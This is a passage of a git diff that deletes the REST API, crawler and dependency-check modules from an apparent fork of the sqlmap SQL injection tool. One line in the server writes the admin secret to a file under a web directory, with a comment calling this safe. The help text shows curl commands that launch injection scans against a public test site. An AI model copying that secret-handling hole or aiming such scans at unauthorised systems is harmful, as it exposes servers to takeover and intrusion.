PART_RUN_CONTENT_TYPES -from lib.core.exception import SqlmapConnectionException -from lib.core.log import LOGGER_HANDLER -from lib.core.optiondict import optDict -from lib.core.settings import RESTAPI_DEFAULT_ADAPTER -from lib.core.settings import IS_WIN -from lib.core.settings import RESTAPI_DEFAULT_ADDRESS -from lib.core.settings import RESTAPI_DEFAULT_PORT -from lib.core.subprocessng import Popen -from lib.parse.cmdline import cmdLineParser -from thirdparty.bottle.bottle import error as return_error -from thirdparty.bottle.bottle import get -from thirdparty.bottle.bottle import hook -from thirdparty.bottle.bottle import post -from thirdparty.bottle.bottle import request -from thirdparty.bottle.bottle import response -from thirdparty.bottle.bottle import run - - -# global settings -class DataStore(object): - admin_id = "" - current_db = None - tasks = dict() - - -# API objects -class Database(object): - filepath = None - - def __init__(self, database=None): - self.database = self.filepath if database is None else database - self.connection = None - self.cursor = None - - def connect(self, who="server"): - self.connection = sqlite3.connect(self.database, timeout=3, isolation_level=None) - self.cursor = self.connection.cursor() - logger.debug("REST-JSON API %s connected to IPC database" % who) - - def disconnect(self): - if self.cursor: - self.cursor.close() - - if self.connection: - self.connection.close() - - def commit(self): - self.connection.commit() - - def execute(self, statement, arguments=None): - while True: - try: - if arguments: - self.cursor.execute(statement, arguments) - else: - self.cursor.execute(statement) - except sqlite3.OperationalError, ex: - if not "locked" in getSafeExString(ex): - raise - else: - break - - if statement.lstrip().upper().startswith("SELECT"): - return self.cursor.fetchall() - - def init(self): - self.execute("CREATE TABLE logs(" - "id INTEGER PRIMARY KEY AUTOINCREMENT, " - "taskid INTEGER, time TEXT, " - "level TEXT, message 
TEXT" - ")") - - self.execute("CREATE TABLE data(" - "id INTEGER PRIMARY KEY AUTOINCREMENT, " - "taskid INTEGER, status INTEGER, " - "content_type INTEGER, value TEXT" - ")") - - self.execute("CREATE TABLE errors(" - "id INTEGER PRIMARY KEY AUTOINCREMENT, " - "taskid INTEGER, error TEXT" - ")") - - -class Task(object): - def __init__(self, taskid, remote_addr): - self.remote_addr = remote_addr - self.process = None - self.output_directory = None - self.options = None - self._original_options = None - self.initialize_options(taskid) - - def initialize_options(self, taskid): - datatype = {"boolean": False, "string": None, "integer": None, "float": None} - self.options = AttribDict() - - for _ in optDict: - for name, type_ in optDict[_].items(): - type_ = unArrayizeValue(type_) - self.options[name] = _defaults.get(name, datatype[type_]) - - # Let sqlmap engine knows it is getting called by the API, - # the task ID and the file path of the IPC database - self.options.api = True - self.options.taskid = taskid - self.options.database = Database.filepath - - # Enforce batch mode and disable coloring and ETA - self.options.batch = True - self.options.disableColoring = True - self.options.eta = False - - self._original_options = AttribDict(self.options) - - def set_option(self, option, value): - self.options[option] = value - - def get_option(self, option): - return self.options[option] - - def get_options(self): - return self.options - - def reset_options(self): - self.options = AttribDict(self._original_options) - - def engine_start(self): - if os.path.exists("sqlmap.py"): - self.process = Popen(["python", "sqlmap.py", "--pickled-options", base64pickle(self.options)], shell=False, close_fds=not IS_WIN) - else: - self.process = Popen(["sqlmap", "--pickled-options", base64pickle(self.options)], shell=False, close_fds=not IS_WIN) - - def engine_stop(self): - if self.process: - self.process.terminate() - return self.process.wait() - else: - return None - - def 
engine_process(self): - return self.process - - def engine_kill(self): - if self.process: - try: - self.process.kill() - return self.process.wait() - except: - pass - return None - - def engine_get_id(self): - if self.process: - return self.process.pid - else: - return None - - def engine_get_returncode(self): - if self.process: - self.process.poll() - return self.process.returncode - else: - return None - - def engine_has_terminated(self): - return isinstance(self.engine_get_returncode(), int) - - -# Wrapper functions for sqlmap engine -class StdDbOut(object): - def __init__(self, taskid, messagetype="stdout"): - # Overwrite system standard output and standard error to write - # to an IPC database - self.messagetype = messagetype - self.taskid = taskid - - if self.messagetype == "stdout": - sys.stdout = self - else: - sys.stderr = self - - def write(self, value, status=CONTENT_STATUS.IN_PROGRESS, content_type=None): - if self.messagetype == "stdout": - if content_type is None: - if kb.partRun is not None: - content_type = PART_RUN_CONTENT_TYPES.get(kb.partRun) - else: - # Ignore all non-relevant messages - return - - output = conf.database_cursor.execute( - "SELECT id, status, value FROM data WHERE taskid = ? 
AND content_type = ?", - (self.taskid, content_type)) - - # Delete partial output from IPC database if we have got a complete output - if status == CONTENT_STATUS.COMPLETE: - if len(output) > 0: - for index in xrange(len(output)): - conf.database_cursor.execute("DELETE FROM data WHERE id = ?", - (output[index][0],)) - - conf.database_cursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)", - (self.taskid, status, content_type, jsonize(value))) - if kb.partRun: - kb.partRun = None - - elif status == CONTENT_STATUS.IN_PROGRESS: - if len(output) == 0: - conf.database_cursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)", - (self.taskid, status, content_type, - jsonize(value))) - else: - new_value = "%s%s" % (dejsonize(output[0][2]), value) - conf.database_cursor.execute("UPDATE data SET value = ? WHERE id = ?", - (jsonize(new_value), output[0][0])) - else: - conf.database_cursor.execute("INSERT INTO errors VALUES(NULL, ?, ?)", - (self.taskid, str(value) if value else "")) - - def flush(self): - pass - - def close(self): - pass - - def seek(self): - pass - - -class LogRecorder(logging.StreamHandler): - def emit(self, record): - """ - Record emitted events to IPC database for asynchronous I/O - communication with the parent process - """ - conf.database_cursor.execute("INSERT INTO logs VALUES(NULL, ?, ?, ?, ?)", - (conf.taskid, time.strftime("%X"), record.levelname, - record.msg % record.args if record.args else record.msg)) - - -def setRestAPILog(): - if hasattr(conf, "api"): - try: - conf.database_cursor = Database(conf.database) - conf.database_cursor.connect("client") - except sqlite3.OperationalError, ex: - raise SqlmapConnectionException, "%s ('%s')" % (ex, conf.database) - - # Set a logging handler that writes log messages to a IPC database - logger.removeHandler(LOGGER_HANDLER) - LOGGER_RECORDER = LogRecorder() - logger.addHandler(LOGGER_RECORDER) - - -# Generic functions -def is_admin(taskid): - return DataStore.admin_id == taskid - - 
-@hook("after_request") -def security_headers(json_header=True): - """ - Set some headers across all HTTP responses - """ - response.headers["Server"] = "Server" - response.headers["X-Content-Type-Options"] = "nosniff" - response.headers["X-Frame-Options"] = "DENY" - response.headers["X-XSS-Protection"] = "1; mode=block" - response.headers["Pragma"] = "no-cache" - response.headers["Cache-Control"] = "no-cache" - response.headers["Expires"] = "0" - if json_header: - response.content_type = "application/json; charset=UTF-8" - -############################## -# HTTP Status Code functions # -############################## - - -@return_error(401) # Access Denied -def error401(error=None): - security_headers(False) - return "Access denied" - - -@return_error(404) # Not Found -def error404(error=None): - security_headers(False) - return "Nothing here" - - -@return_error(405) # Method Not Allowed (e.g. when requesting a POST method via GET) -def error405(error=None): - security_headers(False) - return "Method not allowed" - - -@return_error(500) # Internal Server Error -def error500(error=None): - security_headers(False) - return "Internal server error" - -############################# -# Task management functions # -############################# - - -# Users' methods -@get("/task/new") -def task_new(): - """ - Create new task ID - """ - taskid = hexencode(os.urandom(8)) - remote_addr = request.remote_addr - - DataStore.tasks[taskid] = Task(taskid, remote_addr) - - logger.debug("Created new task: '%s'" % taskid) - return jsonize({"success": True, "taskid": taskid}) - - -@get("/task//delete") -def task_delete(taskid): - """ - Delete own task ID - """ - if taskid in DataStore.tasks: - DataStore.tasks.pop(taskid) - - logger.debug("[%s] Deleted task" % taskid) - return jsonize({"success": True}) - else: - logger.warning("[%s] Invalid task ID provided to task_delete()" % taskid) - return jsonize({"success": False, "message": "Invalid task ID"}) - -################### -# Admin 
functions # -################### - - -@get("/admin//list") -def task_list(taskid=None): - """ - List task pull - """ - tasks = {} - - for key in DataStore.tasks: - if is_admin(taskid) or DataStore.tasks[key].remote_addr == request.remote_addr: - tasks[key] = dejsonize(scan_status(key))["status"] - - logger.debug("[%s] Listed task pool (%s)" % (taskid, "admin" if is_admin(taskid) else request.remote_addr)) - return jsonize({"success": True, "tasks": tasks, "tasks_num": len(tasks)}) - -@get("/admin//flush") -def task_flush(taskid): - """ - Flush task spool (delete all tasks) - """ - - for key in list(DataStore.tasks): - if is_admin(taskid) or DataStore.tasks[key].remote_addr == request.remote_addr: - DataStore.tasks[key].engine_kill() - del DataStore.tasks[key] - - logger.debug("[%s] Flushed task pool (%s)" % (taskid, "admin" if is_admin(taskid) else request.remote_addr)) - return jsonize({"success": True}) - -################################## -# sqlmap core interact functions # -################################## - - -# Handle task's options -@get("/option//list") -def option_list(taskid): - """ - List options for a certain task ID - """ - if taskid not in DataStore.tasks: - logger.warning("[%s] Invalid task ID provided to option_list()" % taskid) - return jsonize({"success": False, "message": "Invalid task ID"}) - - logger.debug("[%s] Listed task options" % taskid) - return jsonize({"success": True, "options": DataStore.tasks[taskid].get_options()}) - - -@post("/option//get") -def option_get(taskid): - """ - Get the value of an option (command line switch) for a certain task ID - """ - if taskid not in DataStore.tasks: - logger.warning("[%s] Invalid task ID provided to option_get()" % taskid) - return jsonize({"success": False, "message": "Invalid task ID"}) - - option = request.json.get("option", "") - - if option in DataStore.tasks[taskid].options: - logger.debug("[%s] Retrieved value for option %s" % (taskid, option)) - return jsonize({"success": True, option: 
DataStore.tasks[taskid].get_option(option)}) - else: - logger.debug("[%s] Requested value for unknown option %s" % (taskid, option)) - return jsonize({"success": False, "message": "Unknown option", option: "not set"}) - - -@post("/option//set") -def option_set(taskid): - """ - Set an option (command line switch) for a certain task ID - """ - if taskid not in DataStore.tasks: - logger.warning("[%s] Invalid task ID provided to option_set()" % taskid) - return jsonize({"success": False, "message": "Invalid task ID"}) - - for option, value in request.json.items(): - DataStore.tasks[taskid].set_option(option, value) - - logger.debug("[%s] Requested to set options" % taskid) - return jsonize({"success": True}) - - -# Handle scans -@post("/scan//start") -def scan_start(taskid): - """ - Launch a scan - """ - if taskid not in DataStore.tasks: - logger.warning("[%s] Invalid task ID provided to scan_start()" % taskid) - return jsonize({"success": False, "message": "Invalid task ID"}) - - # Initialize sqlmap engine's options with user's provided options, if any - for option, value in request.json.items(): - DataStore.tasks[taskid].set_option(option, value) - - # Launch sqlmap engine in a separate process - DataStore.tasks[taskid].engine_start() - - logger.debug("[%s] Started scan" % taskid) - return jsonize({"success": True, "engineid": DataStore.tasks[taskid].engine_get_id()}) - - -@get("/scan//stop") -def scan_stop(taskid): - """ - Stop a scan - """ - if (taskid not in DataStore.tasks or - DataStore.tasks[taskid].engine_process() is None or - DataStore.tasks[taskid].engine_has_terminated()): - logger.warning("[%s] Invalid task ID provided to scan_stop()" % taskid) - return jsonize({"success": False, "message": "Invalid task ID"}) - - DataStore.tasks[taskid].engine_stop() - - logger.debug("[%s] Stopped scan" % taskid) - return jsonize({"success": True}) - - -@get("/scan//kill") -def scan_kill(taskid): - """ - Kill a scan - """ - if (taskid not in DataStore.tasks or - 
DataStore.tasks[taskid].engine_process() is None or - DataStore.tasks[taskid].engine_has_terminated()): - logger.warning("[%s] Invalid task ID provided to scan_kill()" % taskid) - return jsonize({"success": False, "message": "Invalid task ID"}) - - DataStore.tasks[taskid].engine_kill() - - logger.debug("[%s] Killed scan" % taskid) - return jsonize({"success": True}) - - -@get("/scan//status") -def scan_status(taskid): - """ - Returns status of a scan - """ - if taskid not in DataStore.tasks: - logger.warning("[%s] Invalid task ID provided to scan_status()" % taskid) - return jsonize({"success": False, "message": "Invalid task ID"}) - - if DataStore.tasks[taskid].engine_process() is None: - status = "not running" - else: - status = "terminated" if DataStore.tasks[taskid].engine_has_terminated() is True else "running" - - logger.debug("[%s] Retrieved scan status" % taskid) - return jsonize({ - "success": True, - "status": status, - "returncode": DataStore.tasks[taskid].engine_get_returncode() - }) - - -@get("/scan//data") -def scan_data(taskid): - """ - Retrieve the data of a scan - """ - json_data_message = list() - json_errors_message = list() - - if taskid not in DataStore.tasks: - logger.warning("[%s] Invalid task ID provided to scan_data()" % taskid) - return jsonize({"success": False, "message": "Invalid task ID"}) - - # Read all data from the IPC database for the taskid - for status, content_type, value in DataStore.current_db.execute( - "SELECT status, content_type, value FROM data WHERE taskid = ? ORDER BY id ASC", - (taskid,)): - json_data_message.append( - {"status": status, "type": content_type, "value": dejsonize(value)}) - - # Read all error messages from the IPC database - for error in DataStore.current_db.execute( - "SELECT error FROM errors WHERE taskid = ? 
ORDER BY id ASC", - (taskid,)): - json_errors_message.append(error) - - logger.debug("[%s] Retrieved scan data and error messages" % taskid) - return jsonize({"success": True, "data": json_data_message, "error": json_errors_message}) - - -# Functions to handle scans' logs -@get("/scan//log//") -def scan_log_limited(taskid, start, end): - """ - Retrieve a subset of log messages - """ - json_log_messages = list() - - if taskid not in DataStore.tasks: - logger.warning("[%s] Invalid task ID provided to scan_log_limited()" % taskid) - return jsonize({"success": False, "message": "Invalid task ID"}) - - if not start.isdigit() or not end.isdigit() or end < start: - logger.warning("[%s] Invalid start or end value provided to scan_log_limited()" % taskid) - return jsonize({"success": False, "message": "Invalid start or end value, must be digits"}) - - start = max(1, int(start)) - end = max(1, int(end)) - - # Read a subset of log messages from the IPC database - for time_, level, message in DataStore.current_db.execute( - ("SELECT time, level, message FROM logs WHERE " - "taskid = ? AND id >= ? AND id <= ? ORDER BY id ASC"), - (taskid, start, end)): - json_log_messages.append({"time": time_, "level": level, "message": message}) - - logger.debug("[%s] Retrieved scan log messages subset" % taskid) - return jsonize({"success": True, "log": json_log_messages}) - - -@get("/scan//log") -def scan_log(taskid): - """ - Retrieve the log messages - """ - json_log_messages = list() - - if taskid not in DataStore.tasks: - logger.warning("[%s] Invalid task ID provided to scan_log()" % taskid) - return jsonize({"success": False, "message": "Invalid task ID"}) - - # Read all log messages from the IPC database - for time_, level, message in DataStore.current_db.execute( - "SELECT time, level, message FROM logs WHERE taskid = ? 
ORDER BY id ASC", (taskid,)): - json_log_messages.append({"time": time_, "level": level, "message": message}) - - logger.debug("[%s] Retrieved scan log messages" % taskid) - return jsonize({"success": True, "log": json_log_messages}) - - -# Function to handle files inside the output directory -@get("/download///") -def download(taskid, target, filename): - """ - Download a certain file from the file system - """ - if taskid not in DataStore.tasks: - logger.warning("[%s] Invalid task ID provided to download()" % taskid) - return jsonize({"success": False, "message": "Invalid task ID"}) - - path = os.path.abspath(os.path.join(paths.SQLMAP_OUTPUT_PATH, target, filename)) - # Prevent file path traversal - if not path.startswith(paths.SQLMAP_OUTPUT_PATH): - logger.warning("[%s] Forbidden path (%s)" % (taskid, target)) - return jsonize({"success": False, "message": "Forbidden path"}) - - if os.path.isfile(path): - logger.debug("[%s] Retrieved content of file %s" % (taskid, target)) - with open(path, 'rb') as inf: - file_content = inf.read() - return jsonize({"success": True, "file": file_content.encode("base64")}) - else: - logger.warning("[%s] File does not exist %s" % (taskid, target)) - return jsonize({"success": False, "message": "File does not exist"}) - - -def server(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, adapter=RESTAPI_DEFAULT_ADAPTER): - """ - REST-JSON API server - """ - DataStore.admin_id = hexencode(os.urandom(16)) - Database.filepath = tempfile.mkstemp(prefix="sqlmapipc-", text=False)[1] - #make adminid to known this is safe because api only avalible to local - file_object = open('/www/xseclab.com/termite/.sqlmapadminid', 'w') - file_object.write(DataStore.admin_id) - file_object.close( ) - - logger.info("Running REST-JSON API server at '%s:%d'.." 
% (host, port)) - logger.info("Admin ID: %s" % DataStore.admin_id) - logger.debug("IPC database: %s" % Database.filepath) - - # Initialize IPC database - DataStore.current_db = Database() - DataStore.current_db.connect() - DataStore.current_db.init() - - # Run RESTful API - try: - if adapter == "gevent": - from gevent import monkey - monkey.patch_all() - elif adapter == "eventlet": - import eventlet - eventlet.monkey_patch() - logger.debug("Using adapter '%s' to run bottle" % adapter) - run(host=host, port=port, quiet=True, debug=False, server=adapter) - except socket.error, ex: - if "already in use" in getSafeExString(ex): - logger.error("Address already in use ('%s:%s')" % (host, port)) - else: - raise - except ImportError: - errMsg = "Adapter '%s' is not available on this system" % adapter - if adapter in ("gevent", "eventlet"): - errMsg += " (e.g.: 'sudo apt-get install python-%s')" % adapter - logger.critical(errMsg) - -def _client(url, options=None): - logger.debug("Calling %s" % url) - try: - data = None - if options is not None: - data = jsonize(options) - req = urllib2.Request(url, data, {'Content-Type': 'application/json'}) - response = urllib2.urlopen(req) - text = response.read() - except: - if options: - logger.error("Failed to load and parse %s" % url) - raise - return text - - -def client(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT): - """ - REST-JSON API client - """ - - dbgMsg = "Example client access from command line:" - dbgMsg += "\n\t$ taskid=$(curl http://%s:%d/task/new 2>1 | grep -o -I '[a-f0-9]\{16\}') && echo $taskid" % (host, port) - dbgMsg += "\n\t$ curl -H \"Content-Type: application/json\" -X POST -d '{\"url\": \"http://testphp.vulnweb.com/artists.php?artist=1\"}' http://%s:%d/scan/$taskid/start" % (host, port) - dbgMsg += "\n\t$ curl http://%s:%d/scan/$taskid/data" % (host, port) - dbgMsg += "\n\t$ curl http://%s:%d/scan/$taskid/log" % (host, port) - logger.debug(dbgMsg) - - addr = "http://%s:%d" % (host, port) - 
logger.info("Starting REST-JSON API client to '%s'..." % addr) - - try: - _client(addr) - except Exception, ex: - if not isinstance(ex, urllib2.HTTPError): - errMsg = "There has been a problem while connecting to the " - errMsg += "REST-JSON API server at '%s' " % addr - errMsg += "(%s)" % ex - logger.critical(errMsg) - return - - taskid = None - logger.info("Type 'help' or '?' for list of available commands") - - while True: - try: - command = raw_input("api%s> " % (" (%s)" % taskid if taskid else "")).strip().lower() - except (EOFError, KeyboardInterrupt): - print - break - - if command in ("data", "log", "status", "stop", "kill"): - if not taskid: - logger.error("No task ID in use") - continue - raw = _client("%s/scan/%s/%s" % (addr, taskid, command)) - res = dejsonize(raw) - if not res["success"]: - logger.error("Failed to execute command %s" % command) - dataToStdout("%s\n" % raw) - - elif command.startswith("new"): - if ' ' not in command: - logger.error("Program arguments are missing") - continue - - argv = ["sqlmap.py"] + shlex.split(command)[1:] - - try: - cmdLineOptions = cmdLineParser(argv).__dict__ - except: - taskid = None - continue - - for key in list(cmdLineOptions): - if cmdLineOptions[key] is None: - del cmdLineOptions[key] - - raw = _client("%s/task/new" % addr) - res = dejsonize(raw) - if not res["success"]: - logger.error("Failed to create new task") - continue - taskid = res["taskid"] - logger.info("New task ID is '%s'" % taskid) - - raw = _client("%s/scan/%s/start" % (addr, taskid), cmdLineOptions) - res = dejsonize(raw) - if not res["success"]: - logger.error("Failed to start scan") - continue - logger.info("Scanning started") - - elif command.startswith("use"): - taskid = (command.split()[1] if ' ' in command else "").strip("'\"") - if not taskid: - logger.error("Task ID is missing") - taskid = None - continue - elif not re.search(r"\A[0-9a-fA-F]{16}\Z", taskid): - logger.error("Invalid task ID '%s'" % taskid) - taskid = None - continue - 
logger.info("Switching to task ID '%s' " % taskid) - - elif command in ("list", "flush"): - raw = _client("%s/admin/%s/%s" % (addr, taskid or 0, command)) - res = dejsonize(raw) - if not res["success"]: - logger.error("Failed to execute command %s" % command) - elif command == "flush": - taskid = None - dataToStdout("%s\n" % raw) - - elif command in ("exit", "bye", "quit", 'q'): - return - - elif command in ("help", "?"): - msg = "help Show this help message\n" - msg += "new ARGS Start a new scan task with provided arguments (e.g. 'new -u \"http://testphp.vulnweb.com/artists.php?artist=1\"')\n" - msg += "use TASKID Switch current context to different task (e.g. 'use c04d8c5c7582efb4')\n" - msg += "data Retrieve and show data for current task\n" - msg += "log Retrieve and show log for current task\n" - msg += "status Retrieve and show status for current task\n" - msg += "stop Stop current task\n" - msg += "kill Kill current task\n" - msg += "list Display all tasks\n" - msg += "flush Flush tasks (delete all tasks)\n" - msg += "exit Exit this client\n" - - dataToStdout(msg) - - elif command: - logger.error("Unknown command '%s'" % command) diff --git a/lib/utils/crawler.py b/lib/utils/crawler.py deleted file mode 100644 index 7241be72..00000000 --- a/lib/utils/crawler.py +++ /dev/null @@ -1,215 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import httplib -import os -import re -import urlparse -import tempfile -import time - -from lib.core.common import clearConsoleLine -from lib.core.common import dataToStdout -from lib.core.common import findPageForms -from lib.core.common import getSafeExString -from lib.core.common import openFile -from lib.core.common import readInput -from lib.core.common import safeCSValue -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.exception import 
SqlmapConnectionException -from lib.core.exception import SqlmapSyntaxException -from lib.core.settings import CRAWL_EXCLUDE_EXTENSIONS -from lib.core.threads import getCurrentThreadData -from lib.core.threads import runThreads -from lib.parse.sitemap import parseSitemap -from lib.request.connect import Connect as Request -from thirdparty.beautifulsoup.beautifulsoup import BeautifulSoup -from thirdparty.oset.pyoset import oset - -def crawl(target): - try: - visited = set() - threadData = getCurrentThreadData() - threadData.shared.value = oset() - - def crawlThread(): - threadData = getCurrentThreadData() - - while kb.threadContinue: - with kb.locks.limit: - if threadData.shared.unprocessed: - current = threadData.shared.unprocessed.pop() - if current in visited: - continue - elif conf.crawlExclude and re.search(conf.crawlExclude, current): - dbgMsg = "skipping '%s'" % current - logger.debug(dbgMsg) - continue - else: - visited.add(current) - else: - break - - content = None - try: - if current: - content = Request.getPage(url=current, crawling=True, raise404=False)[0] - except SqlmapConnectionException, ex: - errMsg = "connection exception detected (%s). skipping " % ex - errMsg += "URL '%s'" % current - logger.critical(errMsg) - except SqlmapSyntaxException: - errMsg = "invalid URL detected. skipping '%s'" % current - logger.critical(errMsg) - except httplib.InvalidURL, ex: - errMsg = "invalid URL detected (%s). 
skipping " % ex - errMsg += "URL '%s'" % current - logger.critical(errMsg) - - if not kb.threadContinue: - break - - if isinstance(content, unicode): - try: - match = re.search(r"(?si)]*>(.+)", content) - if match: - content = "%s" % match.group(1) - - soup = BeautifulSoup(content) - tags = soup('a') - - if not tags: - tags = re.finditer(r'(?si)]+href="(?P[^>"]+)"', content) - - for tag in tags: - href = tag.get("href") if hasattr(tag, "get") else tag.group("href") - - if href: - if threadData.lastRedirectURL and threadData.lastRedirectURL[0] == threadData.lastRequestUID: - current = threadData.lastRedirectURL[1] - url = urlparse.urljoin(current, href) - - # flag to know if we are dealing with the same target host - _ = reduce(lambda x, y: x == y, map(lambda x: urlparse.urlparse(x).netloc.split(':')[0], (url, target))) - - if conf.scope: - if not re.search(conf.scope, url, re.I): - continue - elif not _: - continue - - if url.split('.')[-1].lower() not in CRAWL_EXCLUDE_EXTENSIONS: - with kb.locks.value: - threadData.shared.deeper.add(url) - if re.search(r"(.*?)\?(.+)", url): - threadData.shared.value.add(url) - except UnicodeEncodeError: # for non-HTML files - pass - finally: - if conf.forms: - findPageForms(content, current, False, True) - - if conf.verbose in (1, 2): - threadData.shared.count += 1 - status = '%d/%d links visited (%d%%)' % (threadData.shared.count, threadData.shared.length, round(100.0 * threadData.shared.count / threadData.shared.length)) - dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status), True) - - threadData.shared.deeper = set() - threadData.shared.unprocessed = set([target]) - - if not conf.sitemapUrl: - message = "do you want to check for the existence of " - message += "site's sitemap(.xml) [y/N] " - test = readInput(message, default="n") - if test[0] in ("y", "Y"): - found = True - items = None - url = urlparse.urljoin(target, "/sitemap.xml") - try: - items = parseSitemap(url) - except SqlmapConnectionException, ex: - if 
"page not found" in getSafeExString(ex): - found = False - logger.warn("'sitemap.xml' not found") - except: - pass - finally: - if found: - if items: - for item in items: - if re.search(r"(.*?)\?(.+)", item): - threadData.shared.value.add(item) - if conf.crawlDepth > 1: - threadData.shared.unprocessed.update(items) - logger.info("%s links found" % ("no" if not items else len(items))) - - infoMsg = "starting crawler" - if conf.bulkFile: - infoMsg += " for target URL '%s'" % target - logger.info(infoMsg) - - for i in xrange(conf.crawlDepth): - threadData.shared.count = 0 - threadData.shared.length = len(threadData.shared.unprocessed) - numThreads = min(conf.threads, len(threadData.shared.unprocessed)) - - if not conf.bulkFile: - logger.info("searching for links with depth %d" % (i + 1)) - - runThreads(numThreads, crawlThread, threadChoice=(i>0)) - clearConsoleLine(True) - - if threadData.shared.deeper: - threadData.shared.unprocessed = set(threadData.shared.deeper) - else: - break - - except KeyboardInterrupt: - warnMsg = "user aborted during crawling. 
sqlmap " - warnMsg += "will use partial list" - logger.warn(warnMsg) - - finally: - clearConsoleLine(True) - - if not threadData.shared.value: - warnMsg = "no usable links found (with GET parameters)" - logger.warn(warnMsg) - else: - for url in threadData.shared.value: - kb.targets.add((url, None, None, None, None)) - - storeResultsToFile(kb.targets) - -def storeResultsToFile(results): - if not results: - return - - if kb.storeCrawlingChoice is None: - message = "do you want to store crawling results to a temporary file " - message += "for eventual further processing with other tools [y/N] " - test = readInput(message, default="N") - kb.storeCrawlingChoice = test[0] in ("y", "Y") - - if kb.storeCrawlingChoice: - handle, filename = tempfile.mkstemp(prefix="sqlmapcrawling-", suffix=".csv" if conf.forms else ".txt") - os.close(handle) - - infoMsg = "writing crawling results to a temporary file '%s' " % filename - logger.info(infoMsg) - - with openFile(filename, "w+b") as f: - if conf.forms: - f.write("URL,POST\n") - - for url, _, data, _, _ in results: - if conf.forms: - f.write("%s,%s\n" % (safeCSValue(url), safeCSValue(data or ""))) - else: - f.write("%s\n" % url) diff --git a/lib/utils/deps.py b/lib/utils/deps.py deleted file mode 100644 index cbb9787a..00000000 --- a/lib/utils/deps.py +++ /dev/null @@ -1,109 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.data import logger -from lib.core.dicts import DBMS_DICT -from lib.core.enums import DBMS -from lib.core.settings import IS_WIN - -def checkDependencies(): - missing_libraries = set() - - for dbmsName, data in DBMS_DICT.items(): - if data[1] is None: - continue - - try: - if dbmsName in (DBMS.MSSQL, DBMS.SYBASE): - import _mssql - import pymssql - - if not hasattr(pymssql, "__version__") or pymssql.__version__ < "1.0.2": - warnMsg = "'%s' third-party library must be " % data[1] - warnMsg 
+= "version >= 1.0.2 to work properly. " - warnMsg += "Download from %s" % data[2] - logger.warn(warnMsg) - elif dbmsName == DBMS.MYSQL: - import pymysql - elif dbmsName == DBMS.PGSQL: - import psycopg2 - elif dbmsName == DBMS.ORACLE: - import cx_Oracle - elif dbmsName == DBMS.SQLITE: - import sqlite3 - elif dbmsName == DBMS.ACCESS: - import pyodbc - elif dbmsName == DBMS.FIREBIRD: - import kinterbasdb - elif dbmsName == DBMS.DB2: - import ibm_db_dbi - elif dbmsName == DBMS.HSQLDB: - import jaydebeapi - import jpype - except ImportError: - warnMsg = "sqlmap requires '%s' third-party library " % data[1] - warnMsg += "in order to directly connect to the DBMS " - warnMsg += "%s. Download from %s" % (dbmsName, data[2]) - logger.warn(warnMsg) - missing_libraries.add(data[1]) - - continue - - debugMsg = "'%s' third-party library is found" % data[1] - logger.debug(debugMsg) - - try: - import impacket - debugMsg = "'python-impacket' third-party library is found" - logger.debug(debugMsg) - except ImportError: - warnMsg = "sqlmap requires 'python-impacket' third-party library for " - warnMsg += "out-of-band takeover feature. Download from " - warnMsg += "http://code.google.com/p/impacket/" - logger.warn(warnMsg) - missing_libraries.add('python-impacket') - - try: - import ntlm - debugMsg = "'python-ntlm' third-party library is found" - logger.debug(debugMsg) - except ImportError: - warnMsg = "sqlmap requires 'python-ntlm' third-party library " - warnMsg += "if you plan to attack a web application behind NTLM " - warnMsg += "authentication. Download from http://code.google.com/p/python-ntlm/" - logger.warn(warnMsg) - missing_libraries.add('python-ntlm') - - try: - from websocket import ABNF - debugMsg = "'python websocket-client' library is found" - logger.debug(debugMsg) - except ImportError: - warnMsg = "sqlmap requires 'websocket-client' third-party library " - warnMsg += "if you plan to attack a web application using WebSocket. 
" - warnMsg += "Download from https://pypi.python.org/pypi/websocket-client/" - logger.warn(warnMsg) - missing_libraries.add('websocket-client') - - if IS_WIN: - try: - import pyreadline - debugMsg = "'python-pyreadline' third-party library is found" - logger.debug(debugMsg) - except ImportError: - warnMsg = "sqlmap requires 'pyreadline' third-party library to " - warnMsg += "be able to take advantage of the sqlmap TAB " - warnMsg += "completion and history support features in the SQL " - warnMsg += "shell and OS shell. Download from " - warnMsg += "http://ipython.scipy.org/moin/PyReadline/Intro" - logger.warn(warnMsg) - missing_libraries.add('python-pyreadline') - - if len(missing_libraries) == 0: - infoMsg = "all dependencies are installed" - logger.info(infoMsg) - diff --git a/lib/utils/getch.py b/lib/utils/getch.py deleted file mode 100644 index e42fc18b..00000000 --- a/lib/utils/getch.py +++ /dev/null @@ -1,84 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -class _Getch(object): - """ - Gets a single character from standard input. 
Does not echo to - the screen (reference: http://code.activestate.com/recipes/134892/) - """ - def __init__(self): - try: - self.impl = _GetchWindows() - except ImportError: - try: - self.impl = _GetchMacCarbon() - except(AttributeError, ImportError): - self.impl = _GetchUnix() - - def __call__(self): - return self.impl() - - -class _GetchUnix(object): - def __init__(self): - import tty - - def __call__(self): - import sys - import termios - import tty - - fd = sys.stdin.fileno() - old_settings = termios.tcgetattr(fd) - try: - tty.setraw(sys.stdin.fileno()) - ch = sys.stdin.read(1) - finally: - termios.tcsetattr(fd, termios.TCSADRAIN, old_settings) - return ch - - -class _GetchWindows(object): - def __init__(self): - import msvcrt - - def __call__(self): - import msvcrt - return msvcrt.getch() - - -class _GetchMacCarbon(object): - """ - A function which returns the current ASCII key that is down; - if no ASCII key is down, the null string is returned. The - page http://www.mactech.com/macintosh-c/chap02-1.html was - very helpful in figuring out how to do this. 
